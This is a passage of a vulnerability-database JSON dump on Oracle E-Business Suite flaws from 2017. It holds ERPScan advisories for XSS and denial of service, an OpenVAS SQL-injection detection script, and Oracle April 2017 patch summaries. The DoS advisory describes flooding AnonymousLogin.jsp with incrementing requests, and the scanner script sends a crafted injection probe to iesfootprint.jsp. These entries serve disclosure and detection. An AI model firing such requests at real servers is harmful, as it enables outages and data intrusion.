URL:\n\nhttp://victim_ebs_server/OA_HTML/jtffmprintserver.jsp\n\nTo reproduce the attack, you need to create a print server with XSS vector in the vulnerable parameters. This JSP is available for all E-Business Suite users.\n", "edition": 5, "modified": "2016-12-23T00:00:00", "published": "2016-12-23T00:00:00", "id": "ERPSCAN-17-026", "href": "https://erpscan.io/advisories/erpscan-17-026-xss-oracle-e-business-suite-jtffmprintserver/", "title": "XSS - Oracle E-Business Suite JTFFMPRINTSERVER", "type": "erpscan", "cvss": {"score": 7.8, "vector": "AV:N/AC:M/Au:N/C:P/I:C/A:N"}}, {"lastseen": "2020-09-17T08:51:12", "bulletinFamily": "info", "cvelist": ["CVE-2017-3555"], "description": "**Application:** Oracle E-Business Suite \n**Versions Affected: **Oracle E-Business Suite 12.2.3 \n**Vendor:** [Oracle](<http://www.oracle.com/>) \n**Bugs: **DoS \n**Reported:** 23.12.2016 \n**Vendor response:** 24.12.2016 \n**Date of Public Advisory:** 18.04.2017 \n**Reference: **[Oracle CPU April 2017](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) \n**Authors:** Alexey Tyurin (ERPScan), Ivan Chalykin (ERPScan)\n\n## VULNERABILITY INFORMATION\n\nClass: DoS \nImpact: direct impact on availability \nRemotely Exploitable: yes \nLocally Exploitable: yes \nCVE: CVE-2017-3555\n\n### CVSS Information\n\nCVSS Base Score v3: 7.5/10 \nCVSS Base Vector:\n\nAV: Attack Vector (Related exploit range) | Network (N) \n---|--- \nAC: Attack Complexity (Required attack complexity) | Low (L) \nPR: Privileges Required (Level of privileges needed to exploit) | None (N) \nUI: User Interaction (Required user participation) | None (N) \nS: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) \nC: Impact to Confidentiality | None (N) \nI: Impact to Integrity | None (N) \nA: Impact to Availability| High (H) \n \n## VULNERABILITY DESCRIPTION\n\nAn anonymous attacker can send many special requests to `AnonymousLogin.jsp` and cause a denial of service of the whole subsystem.\n\n## VULNERABLE PACKAGES\n\nOracle E-Business Suite 12.2.3\n\n## SOLUTIONS AND WORKAROUNDS\n\nTo correct this vulnerability, implement [Oracle CPU April 2017](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>)\n\n## TECHNICAL DESCRIPTION\n\n### Proof of Concept\n\nVulnerable URL:\n\nhttp://victim_ebs_server/OA_HTML/AnonymousLogin.jsp?i_1=1000&home_url=\n\nAn attacker can send multiple requests to the vulnerable JSP with incrementally increasing the `i_1` parameter (1000,1001,1002,etc). \n\nAs a result, after several hundred requests the main web app (OA_HTML/AppsLogin) stops working and displays the following errors:\n\n_\u201cFailure of server APACHE bridge. No backend server available for connection\u2026\u201d_\n\n_\u201cThe system has encountered an error when servicing the request, Please try again\u2026\u201d_\n", "edition": 5, "modified": "2016-12-23T00:00:00", "published": "2016-12-23T00:00:00", "id": "ERPSCAN-17-024", "href": "https://erpscan.io/advisories/erpscan-17-024-dos-oracle-e-business-suite-anonymouslogin/", "title": "DoS in Oracle E-Business Suite ANONYMOUSLOGIN", "type": "erpscan", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "openvas": [{"lastseen": "2020-05-12T17:10:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3549"], "description": "This host is installed with Oracle E-Business\n Suite is prone to SQL injection vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2017-04-27T00:00:00", "id": "OPENVAS:1361412562310811016", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811016", "type": "openvas", "title": "Oracle E-Business Suite 'IESFOOTPRINT' SQL Injection Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle E-Business Suite 'IESFOOTPRINT' SQL Injection Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:e-business_suite\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811016\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2017-3549\");\n script_bugtraq_id(97748);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-04-27 11:25:39 +0530 (Thu, 27 Apr 2017)\");\n script_name(\"Oracle E-Business Suite 'IESFOOTPRINT' SQL Injection Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Oracle E-Business\n Suite is prone to SQL injection vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check the response.\");\n\n script_tag(name:\"insight\", value:\"The vulnerability exists due to some\n unspecified error within the application.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to read sensitive data, modify or delete data from database.\");\n\n script_tag(name:\"affected\", value:\"Oracle E-Business Suite versions 12.1.1,\n 12.1.2, 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6\");\n\n script_tag(name:\"solution\", value:\"Apply patch from the vendor advisory.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/41926\");\n script_xref(name:\"URL\", value:\"https://erpscan.com/advisories/erpscan-17-021-sql-injection-e-business-suite-iesfootprint\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_oracle_ebusiness_suite_detect.nasl\");\n script_mandatory_keys(\"Oracle/eBusiness/Suite/Installed\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!oPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:oPort)){\n exit(0);\n}\n\nif( dir == \"/\" ) dir = \"\";\n\n##Craft URL\nurl = dir + \"/OA_HTML/AppsLocalLogin.jsp\";\n\n##Send Request\nreq = http_get(port: oPort, item: url);\nres = http_keepalive_send_recv(port:oPort, data:req);\n\nredirect = eregmatch(pattern:\"Location: .*(/OA.*)</A></BODY></HTML>\", string:res);\n\n##Send Request\nreq = http_get( item:dir + redirect[1], port:oPort );\nres = http_keepalive_send_recv(port:oPort, data:req);\n\nif(res && \"Set-Cookie:\" >< res)\n{\n cookie1 = eregmatch(pattern:\"Set-Cookie: (JSESSIONID[^;]+)\", string:res);\n if(cookie1[1]){\n exit(0);\n }\n\n cookie2 = eregmatch(pattern:\"Set-Cookie: ([^J;]+)\", string:res);\n if(cookie2[2]){\n exit(0);\n }\n\n ## Complete Cookie\n cookie = cookie1[1] + '; ' + cookie2[1];\n\n if(res && \"title>Login</title\" >< res && 'content=\"Oracle UIX' >< res)\n {\n ## Vulnerable Code here\n url = dir + \"/OA_HTML/iesfootprint.jsp?showgraph=%3C%3Etrue&dscriptId=%3C%3ESQL%20Injection%20Test\";\n\n ##Send Request and check Response\n if(http_vuln_check(port: oPort, url: url, pattern: \">SQL Injection Test\",\n check_header: TRUE, cookie: cookie,\n extra_check: make_list(\">Sign Out<\", \">Oracle Applications<\")))\n {\n report = http_report_vuln_url(port: oPort, url: url);\n security_message(port: oPort, data: report);\n exit(0);\n }\n }\n}\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oracle": [{"lastseen": "2019-05-29T18:21:19", "bulletinFamily": "software", "cvelist": ["CVE-2017-3543", "CVE-2017-3565", "CVE-2017-3556", "CVE-2017-3495", "CVE-2017-3480", "CVE-2017-3585", "CVE-2017-3474", "CVE-2017-3518", "CVE-2017-3549", "CVE-2017-3607", "CVE-2015-5351", "CVE-2017-3434", "CVE-2017-3608", "CVE-2016-8620", "CVE-2015-1792", "CVE-2016-8623", "CVE-2017-3597", "CVE-2016-6796", "CVE-2017-3304", "CVE-2016-5420", "CVE-2017-3552", "CVE-2017-3586", "CVE-2017-3511", "CVE-2017-3356", "CVE-2017-3559", "CVE-2017-3581", "CVE-2017-3462", "CVE-2017-3524", "CVE-2017-3337", "CVE-2017-3579", "CVE-2016-6288", "CVE-2017-3347", "CVE-2016-4436", "CVE-2016-6290", "CVE-2016-8615", "CVE-2016-8616", "CVE-2017-3560", "CVE-2016-5019", "CVE-2016-8619", "CVE-2015-3236", "CVE-2017-3342", "CVE-2016-6306", "CVE-2017-3530", "CVE-2017-3541", "CVE-2017-3527", "CVE-2015-1789", "CVE-2017-3610", "CVE-2016-2183", "CVE-2017-3460", "CVE-2017-3432", "CVE-2017-3573", "CVE-2017-3487", "CVE-2017-3493", "CVE-2017-3528", "CVE-2015-0286", "CVE-2016-2178", "CVE-2017-3514", "CVE-2013-2005", "CVE-2017-3507", "CVE-2017-3478", "CVE-2017-3611", "CVE-2015-3195", "CVE-2017-3516", "CVE-2016-8743", "CVE-2017-3592", "CVE-2017-3571", "CVE-2017-3525", "CVE-2017-3563", "CVE-2017-3482", "CVE-2017-3476", "CVE-2016-8625", "CVE-2016-8618", "CVE-2017-3606", "CVE-2016-0714", "CVE-2016-3092", "CVE-2017-3477", "CVE-2014-3571", "CVE-2017-3506", "CVE-2017-3540", "CVE-2017-3471", "CVE-2016-6302", "CVE-2013-1985", "CVE-2017-3499", "CVE-2016-2177", "CVE-2017-3233", "CVE-2017-3569", "CVE-2013-1982", "CVE-2017-3465", "CVE-2017-3230", "CVE-2012-5883", "CVE-2017-3232", "CVE-2017-3619", "CVE-2016-0729", "CVE-2016-0635", "CVE-2016-2105", "CVE-2017-3622", "CVE-2013-1984", "CVE-2017-3513", "CVE-2017-3489", "CVE-2017-3306", "CVE-2017-3508", "CVE-2017-3459", "CVE-2016-2107", "CVE-2017-3568", "CVE-2016-7055", "CVE-2016-3607", "CVE-2015-7501", "CVE-2017-3510", "CVE-2017-3731", "CVE-2017-3625", "CVE-2016-6307", "CVE-2017-3572", "CVE-2013-2003", "CVE-2017-3536", "CVE-2017-3302", "CVE-2016-2510", "CVE-2017-3512", "CVE-2017-3503", "CVE-2017-5638", "CVE-2017-3564", "CVE-2016-8617", "CVE-2017-3626", "CVE-2016-0762", "CVE-2017-3502", "CVE-2016-1182", "CVE-2013-1987", "CVE-2017-3612", "CVE-2016-0763", "CVE-2017-3515", "CVE-2017-3463", "CVE-2017-3521", "CVE-2012-0920", "CVE-2016-6308", "CVE-2016-6816", "CVE-2016-2180", "CVE-2017-3591", "CVE-2017-3520", "CVE-2017-3578", "CVE-2017-3355", "CVE-2017-3547", "CVE-2013-1983", "CVE-2017-3613", "CVE-2012-5881", "CVE-2017-3621", "CVE-2017-3497", "CVE-2016-2109", "CVE-2015-5252", "CVE-2017-3456", "CVE-2017-3537", "CVE-2016-2181", "CVE-2017-3601", "CVE-2017-3523", "CVE-2017-3595", "CVE-2016-6304", "CVE-2017-3500", "CVE-2017-3580", "CVE-2014-0114", "CVE-2017-3483", "CVE-2017-3490", "CVE-2017-3451", "CVE-2017-3732", "CVE-2016-5407", "CVE-2017-3594", "CVE-2017-3604", "CVE-2017-3237", "CVE-2017-3618", "CVE-2017-3473", "CVE-2017-3331", "CVE-2017-3504", "CVE-2017-3574", "CVE-2017-3593", "CVE-2013-1995", "CVE-2012-5882", "CVE-2016-6817", "CVE-2017-3309", "CVE-2015-3237", "CVE-2017-3575", "CVE-2017-3329", "CVE-2016-6295", "CVE-2017-3509", "CVE-2017-3491", "CVE-2017-3492", "CVE-2016-6297", "CVE-2016-8622", "CVE-2016-6292", "CVE-2015-1788", "CVE-2017-3505", "CVE-2017-3533", "CVE-2017-3535", "CVE-2017-3605", "CVE-2017-3587", "CVE-2016-3504", "CVE-2017-3308", "CVE-2016-7052", "CVE-2017-3546", "CVE-2017-3558", "CVE-2017-3542", "CVE-2017-3496", "CVE-2017-3467", "CVE-2016-5018", "CVE-2017-3481", "CVE-2017-3345", "CVE-2014-3596", "CVE-2017-3548", "CVE-2017-3602", "CVE-2016-6289", "CVE-2015-0204", "CVE-2017-3583", "CVE-2016-0706", "CVE-2017-3457", "CVE-2017-3609", "CVE-2012-1007", "CVE-2017-3544", "CVE-2017-3603", "CVE-2013-1986", "CVE-2013-2002", "CVE-2017-3554", "CVE-2017-3475", "CVE-2016-8624", "CVE-2017-3570", "CVE-2016-1181", "CVE-2016-5483", "CVE-2016-3739", "CVE-2017-3486", "CVE-2017-3485", "CVE-2013-2566", "CVE-2016-2176", "CVE-2016-8735", "CVE-2015-1790", "CVE-2017-3453", "CVE-2017-3470", "CVE-2016-6294", "CVE-2017-3577", "CVE-2016-6305", "CVE-2017-3538", "CVE-2016-6303", "CVE-2017-3498", "CVE-2017-3526", "CVE-2017-3461", "CVE-2017-3393", "CVE-2017-3464", "CVE-2017-3620", "CVE-2017-3561", "CVE-2016-2182", "CVE-2017-3616", "CVE-2017-3501", "CVE-2017-3600", "CVE-2016-5421", "CVE-2017-3288", "CVE-2017-3522", "CVE-2016-5551", "CVE-2017-3531", "CVE-2017-3551", "CVE-2017-3582", "CVE-2017-3614", "CVE-2017-3458", "CVE-2017-3539", "CVE-2017-3469", "CVE-2004-2761", "CVE-2017-3589", "CVE-2017-3450", "CVE-2015-7940", "CVE-2016-3674", "CVE-2017-3599", "CVE-2017-3555", "CVE-2017-3584", "CVE-2017-3468", "CVE-2017-3615", "CVE-2017-3494", "CVE-2017-3557", "CVE-2017-3596", "CVE-2017-3519", "CVE-2016-6794", "CVE-2016-3506", "CVE-2017-3576", "CVE-2017-3254", "CVE-2017-3307", "CVE-2016-5419", "CVE-2017-3488", "CVE-2017-3553", "CVE-2017-3305", "CVE-2017-3534", "CVE-2017-3479", "CVE-2016-4802", "CVE-2017-3730", "CVE-2017-3623", "CVE-2016-6797", "CVE-2016-2179", "CVE-2017-3452", "CVE-2016-2106", "CVE-2016-6291", "CVE-2017-3517", "CVE-2017-3545", "CVE-2015-4852", "CVE-2017-3550", "CVE-2017-3472", "CVE-2017-3484", "CVE-2017-3234", "CVE-2013-5209", "CVE-2017-3454", "CVE-2017-3598", "CVE-2015-1791", "CVE-2016-8621", "CVE-2016-6296", "CVE-2017-3455", "CVE-2017-3590", "CVE-2017-3567", "CVE-2017-3532", "CVE-2016-6309", "CVE-2013-1998", "CVE-2017-3617"], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\nThis Critical Patch Update contains 300 new security fixes across the product families listed below. Please note that a MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [April 2017 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2252203.1>).\n\nPlease note that the vulnerabilities in this Critical Patch Update are scored using version 3.0 of Common Vulnerability Scoring Standard (CVSS).\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available [here](<http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>).\n", "modified": "2017-06-20T00:00:00", "published": "2017-04-18T00:00:00", "id": "ORACLE:CPUAPR2017-3236618", "href": "", "type": "oracle", "title": "Oracle Critical Patch Update - April 2017", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-04T21:15:59", "bulletinFamily": "software", "cvelist": ["CVE-2004-2761", "CVE-2012-0920", "CVE-2012-1007", "CVE-2012-5881", "CVE-2012-5882", "CVE-2012-5883", "CVE-2013-1982", "CVE-2013-1983", "CVE-2013-1984", "CVE-2013-1985", "CVE-2013-1986", "CVE-2013-1987", "CVE-2013-1995", "CVE-2013-1998", "CVE-2013-2002", "CVE-2013-2003", "CVE-2013-2005", "CVE-2013-2566", "CVE-2013-5209", "CVE-2014-0114", "CVE-2014-3571", "CVE-2014-3596", "CVE-2015-0204", "CVE-2015-0286", "CVE-2015-1788", "CVE-2015-1789", "CVE-2015-1790", "CVE-2015-1791", "CVE-2015-1792", "CVE-2015-3195", "CVE-2015-3236", "CVE-2015-3237", "CVE-2015-4852", "CVE-2015-5252", "CVE-2015-5351", "CVE-2015-7501", "CVE-2015-7940", "CVE-2016-0635", "CVE-2016-0706", "CVE-2016-0714", "CVE-2016-0729", "CVE-2016-0762", "CVE-2016-0763", "CVE-2016-1181", "CVE-2016-1182", "CVE-2016-2105", "CVE-2016-2106", "CVE-2016-2107", "CVE-2016-2109", "CVE-2016-2176", "CVE-2016-2177", "CVE-2016-2178", "CVE-2016-2179", "CVE-2016-2180", "CVE-2016-2181", "CVE-2016-2182", "CVE-2016-2183", "CVE-2016-2510", "CVE-2016-3092", "CVE-2016-3504", "CVE-2016-3506", "CVE-2016-3607", "CVE-2016-3674", "CVE-2016-3739", "CVE-2016-4436", "CVE-2016-4802", "CVE-2016-5018", "CVE-2016-5019", "CVE-2016-5407", "CVE-2016-5419", "CVE-2016-5420", "CVE-2016-5421", "CVE-2016-5483", "CVE-2016-5551", "CVE-2016-6288", "CVE-2016-6289", "CVE-2016-6290", "CVE-2016-6291", "CVE-2016-6292", "CVE-2016-6294", "CVE-2016-6295", "CVE-2016-6296", "CVE-2016-6297", "CVE-2016-6302", "CVE-2016-6303", "CVE-2016-6304", "CVE-2016-6305", "CVE-2016-6306", "CVE-2016-6307", "CVE-2016-6308", "CVE-2016-6309", "CVE-2016-6794", "CVE-2016-6796", "CVE-2016-6797", "CVE-2016-6816", "CVE-2016-6817", "CVE-2016-7052", "CVE-2016-7055", "CVE-2016-8615", "CVE-2016-8616", "CVE-2016-8617", "CVE-2016-8618", "CVE-2016-8619", "CVE-2016-8620", "CVE-2016-8621", "CVE-2016-8622", "CVE-2016-8623", "CVE-2016-8624", "CVE-2016-8625", "CVE-2016-8735", "CVE-2016-8743", "CVE-2017-3230", "CVE-2017-3232", "CVE-2017-3233", "CVE-2017-3234", "CVE-2017-3237", "CVE-2017-3254", "CVE-2017-3288", "CVE-2017-3302", "CVE-2017-3304", "CVE-2017-3305", "CVE-2017-3306", "CVE-2017-3307", "CVE-2017-3308", "CVE-2017-3309", "CVE-2017-3329", "CVE-2017-3331", "CVE-2017-3337", "CVE-2017-3342", "CVE-2017-3345", "CVE-2017-3347", "CVE-2017-3355", "CVE-2017-3356", "CVE-2017-3393", "CVE-2017-3432", "CVE-2017-3434", "CVE-2017-3450", "CVE-2017-3451", "CVE-2017-3452", "CVE-2017-3453", "CVE-2017-3454", "CVE-2017-3455", "CVE-2017-3456", "CVE-2017-3457", "CVE-2017-3458", "CVE-2017-3459", "CVE-2017-3460", "CVE-2017-3461", "CVE-2017-3462", "CVE-2017-3463", "CVE-2017-3464", "CVE-2017-3465", "CVE-2017-3467", "CVE-2017-3468", "CVE-2017-3469", "CVE-2017-3470", "CVE-2017-3471", "CVE-2017-3472", "CVE-2017-3473", "CVE-2017-3474", "CVE-2017-3475", "CVE-2017-3476", "CVE-2017-3477", "CVE-2017-3478", "CVE-2017-3479", "CVE-2017-3480", "CVE-2017-3481", "CVE-2017-3482", "CVE-2017-3483", "CVE-2017-3484", "CVE-2017-3485", "CVE-2017-3486", "CVE-2017-3487", "CVE-2017-3488", "CVE-2017-3489", "CVE-2017-3490", "CVE-2017-3491", "CVE-2017-3492", "CVE-2017-3493", "CVE-2017-3494", "CVE-2017-3495", "CVE-2017-3496", "CVE-2017-3497", "CVE-2017-3498", "CVE-2017-3499", "CVE-2017-3500", "CVE-2017-3501", "CVE-2017-3502", "CVE-2017-3503", "CVE-2017-3504", "CVE-2017-3505", "CVE-2017-3506", "CVE-2017-3507", "CVE-2017-3508", "CVE-2017-3509", "CVE-2017-3510", "CVE-2017-3511", "CVE-2017-3512", "CVE-2017-3513", "CVE-2017-3514", "CVE-2017-3515", "CVE-2017-3516", "CVE-2017-3517", "CVE-2017-3518", "CVE-2017-3519", "CVE-2017-3520", "CVE-2017-3521", "CVE-2017-3522", "CVE-2017-3523", "CVE-2017-3524", "CVE-2017-3525", "CVE-2017-3526", "CVE-2017-3527", "CVE-2017-3528", "CVE-2017-3530", "CVE-2017-3531", "CVE-2017-3532", "CVE-2017-3533", "CVE-2017-3534", "CVE-2017-3535", "CVE-2017-3536", "CVE-2017-3537", "CVE-2017-3538", "CVE-2017-3539", "CVE-2017-3540", "CVE-2017-3541", "CVE-2017-3542", "CVE-2017-3543", "CVE-2017-3544", "CVE-2017-3545", "CVE-2017-3546", "CVE-2017-3547", "CVE-2017-3548", "CVE-2017-3549", "CVE-2017-3550", "CVE-2017-3551", "CVE-2017-3552", "CVE-2017-3553", "CVE-2017-3554", "CVE-2017-3555", "CVE-2017-3556", "CVE-2017-3557", "CVE-2017-3558", "CVE-2017-3559", "CVE-2017-3560", "CVE-2017-3561", "CVE-2017-3563", "CVE-2017-3564", "CVE-2017-3565", "CVE-2017-3567", "CVE-2017-3568", "CVE-2017-3569", "CVE-2017-3570", "CVE-2017-3571", "CVE-2017-3572", "CVE-2017-3573", "CVE-2017-3574", "CVE-2017-3575", "CVE-2017-3576", "CVE-2017-3577", "CVE-2017-3578", "CVE-2017-3579", "CVE-2017-3580", "CVE-2017-3581", "CVE-2017-3582", "CVE-2017-3583", "CVE-2017-3584", "CVE-2017-3585", "CVE-2017-3586", "CVE-2017-3587", "CVE-2017-3589", "CVE-2017-3590", "CVE-2017-3591", "CVE-2017-3592", "CVE-2017-3593", "CVE-2017-3594", "CVE-2017-3595", "CVE-2017-3596", "CVE-2017-3597", "CVE-2017-3598", "CVE-2017-3599", "CVE-2017-3600", "CVE-2017-3601", "CVE-2017-3602", "CVE-2017-3603", "CVE-2017-3604", "CVE-2017-3605", "CVE-2017-3606", "CVE-2017-3607", "CVE-2017-3608", "CVE-2017-3609", "CVE-2017-3610", "CVE-2017-3611", "CVE-2017-3612", "CVE-2017-3613", "CVE-2017-3614", "CVE-2017-3615", "CVE-2017-3616", "CVE-2017-3617", "CVE-2017-3618", "CVE-2017-3619", "CVE-2017-3620", "CVE-2017-3621", "CVE-2017-3622", "CVE-2017-3623", "CVE-2017-3625", "CVE-2017-3626", "CVE-2017-3730", "CVE-2017-3731", "CVE-2017-3732", "CVE-2017-5638"], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\nCritical Patch Updates and Security Alerts for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\nThis Critical Patch Update contains 300 new security fixes across the product families listed below. Please note that a MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [April 2017 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/epmos/faces/DocumentDisplay?id=2252203.1>).\n\nPlease note that the vulnerabilities in this Critical Patch Update are scored using version 3.0 of Common Vulnerability Scoring Standard (CVSS).\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available here.\n", "modified": "2017-06-20T00:00:00", "published": "2017-04-18T00:00:00", "id": "ORACLE:CPUAPR2017", "href": "", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - April 2017", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}